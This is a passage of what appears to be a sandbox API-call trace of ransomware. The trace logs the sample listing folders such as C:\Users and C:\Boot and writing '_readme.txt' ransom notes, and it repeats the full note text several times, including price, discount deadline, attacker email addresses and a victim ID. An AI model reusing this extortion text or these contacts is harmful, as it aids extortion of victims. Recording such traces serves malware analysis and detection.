File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.889] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0165.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.890] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c598 [0165.890] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0xffffffff [0165.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c598 | out: hHeap=0xcd0000) returned 1 [0165.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9d0 | out: hHeap=0xcd0000) returned 1 [0165.890] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.890] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44ed0 [0165.890] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.890] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f18 [0165.890] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f18 | out: hHeap=0xcd0000) returned 1 [0165.890] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f18 [0165.890] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.890] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f18 | out: hHeap=0xcd0000) returned 1 [0165.890] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f18 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.891] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.891] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f18 | out: hHeap=0xcd0000) returned 1 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f18 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.891] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.891] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f18 | out: hHeap=0xcd0000) returned 1 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f18 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.891] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.891] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f18 | out: hHeap=0xcd0000) returned 1 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f18 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.891] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.891] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f18 | out: hHeap=0xcd0000) returned 1 [0165.891] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ed0 | out: hHeap=0xcd0000) returned 1 [0165.891] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9d0 [0165.891] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.891] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.891] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.891] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.891] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9d0 [0165.891] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.891] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.892] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.892] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608c68 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.892] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.892] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608c68 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.892] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9d0 [0165.892] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.892] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9d0 [0165.892] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.892] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44ed0 [0165.892] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f18 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.892] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9d0 [0165.892] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.893] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.893] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.893] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9d0 [0165.893] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.893] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.893] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.893] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.893] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.893] PathFindFileNameW (pszPath="") returned="" [0165.893] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.893] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.893] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.894] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0165.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c598 [0165.894] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.894] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.894] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.894] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0165.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f18 [0165.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44ed0 [0165.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f60 [0165.894] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0165.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608c68 [0165.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608bc0 [0165.894] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608c68 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b18 [0165.895] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608c68 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0165.895] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4a8 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.895] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0165.895] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4a8 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.895] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0165.895] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.895] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9d0 [0165.895] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c958 [0165.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.895] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.896] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.896] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0165.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.896] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.896] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.896] PathFindFileNameW (pszPath="") returned="" [0165.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.896] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.896] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.896] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0165.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.897] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.897] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0165.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.897] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0165.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0165.897] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software 